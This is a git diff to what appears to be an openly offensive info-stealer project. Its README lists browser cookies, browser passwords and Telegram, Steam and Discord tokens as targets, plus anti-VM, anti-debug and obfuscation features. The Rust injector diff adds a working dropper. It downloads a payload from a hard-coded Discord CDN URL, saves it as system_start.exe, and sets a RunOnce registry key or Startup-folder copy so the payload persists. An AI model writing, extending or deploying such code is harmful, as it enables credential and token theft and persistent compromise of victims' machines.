diff --git a/README.md b/README.md index 0a49126eb69c2067d060a698105d822d027fa86d..4e094ba2139f6ae8398696ae540ec8244d82440c 100644 --- a/README.md +++ b/README.md @@ -22,7 +22,13 @@ Additional: - browser cookies - browser passwords - telegram, steam, discord tokens -- persistence via regkey +- persistence via regkey ✅ - anti-VM, anti-debug - packing - obfuscation + +## Inspirations + +https://github.com/Abdulrhmanbk/discoon-malware/ + +https://github.com/doenerium69/doenerium diff --git a/injector/Cargo.toml b/injector/Cargo.toml index 8e92751679621ade365fcf9059380bac9015ef3a..0f246f9d1db73ea25bcc5029fa980a0a272904eb 100644 --- a/injector/Cargo.toml +++ b/injector/Cargo.toml @@ -8,3 +8,5 @@ edition = "2021" [dependencies] reqwest = "*" tokio = { version = "1", features = ["full"] } +directories = "5.0.1" +winreg = "0.50.0" diff --git a/injector/src/main.rs b/injector/src/main.rs index 63a25605ed6b4afcbdfebb343d967ee746f1fd9e..90756cc0467b74cf476be362658d4a42dee02321 100644 --- a/injector/src/main.rs +++ b/injector/src/main.rs @@ -1,7 +1,12 @@ use std::{io::Cursor, env::var_os}; +use directories::UserDirs; +use std::path::Path; +use winreg::enums::*; +use winreg::RegKey; type Result<T> = std::result::Result<T, Box<dyn std::error::Error + Send + Sync>>; -async fn fetch_url(url: String, file_name: String) -> Result<()> { +async fn download_payload(file_name: String) -> Result<()> { + let url = "https://cdn.discordapp.com/attachments/690308962696167469/1108306000726999111/a_suppr.txt".to_string(); let response = reqwest::get(url).await?; let mut file = std::fs::File::create(file_name)?; let mut content = Cursor::new(response.bytes().await?); @@ -11,9 +16,29 @@ async fn fetch_url(url: String, file_name: String) -> Result<()> { #[tokio::main] async fn main() { - let test = var_os("APPDATA").unwrap(); - let appdata = test.to_str().unwrap(); - let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe"; - let startup = format!("{}{}", appdata, right_path); - fetch_url("URL HERE".to_string(), startup.to_string()).await.unwrap(); + + if true { + let user_dirs = UserDirs::new().unwrap() ; + let homedir = user_dirs.home_dir().to_str().unwrap(); + let path = format!("{}{}", homedir, "\\system_start.exe"); + + download_payload(path.to_string()).await.unwrap(); + + let hkcu = RegKey::predef(HKEY_CURRENT_USER); + let reg_path = Path::new("Software") + .join("Microsoft") + .join("Windows") + .join("CurrentVersion") + .join("RunOnce"); + let (key, _) = hkcu.create_subkey(®_path).unwrap(); + key.set_value("System start", &path).unwrap(); + }else{ + let test = var_os("APPDATA").unwrap(); + let appdata = test.to_str().unwrap(); + let right_path = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\system_start.exe"; + let path = format!("{}{}", appdata, right_path); + + download_payload(path.to_string()).await.unwrap(); + + } }